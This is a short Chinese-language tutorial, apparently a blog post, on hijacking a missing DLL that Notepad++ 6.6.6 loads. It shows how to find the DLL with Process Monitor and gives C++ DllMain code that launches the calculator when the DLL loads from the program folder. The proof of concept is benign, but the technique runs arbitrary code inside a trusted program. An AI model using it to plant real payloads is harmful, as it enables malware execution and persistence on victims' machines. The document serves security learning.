劫持不存在的DLL

某些程序会加载不存在的dll文件，这里选择notepad++ 版本6.6.6

• 使用Process Monitor监听，选择过滤方式

  

• 选择loadlibrary相关的API的dll，因为是显式加载，伪造的DLL文件不需要存在任何导出函数即可被成功加载，即使加载后进程内部出错，也是在DLL被成功加载之后的事情

  

  
• 简单做一个恶意dll文件，弹出计算器

  • 创建项目

  

  • 编写代码，编译（这里选择x86编译）

    // dllmain.cpp : 定义 DLL 应用程序的入口点。
    #include "pch.h"
    #include <stdlib.h>
    void getCalc() {
        system("calc");
    }
    
    
    BOOL APIENTRY DllMain( HMODULE hModule,
                           DWORD  ul_reason_for_call,
                           LPVOID lpReserved
                         )
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            getCalc();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
    

  • 将得到的dll文件放入对应目录并改名为对应的名称，启动notepad++

    

    

    成功弹出计算器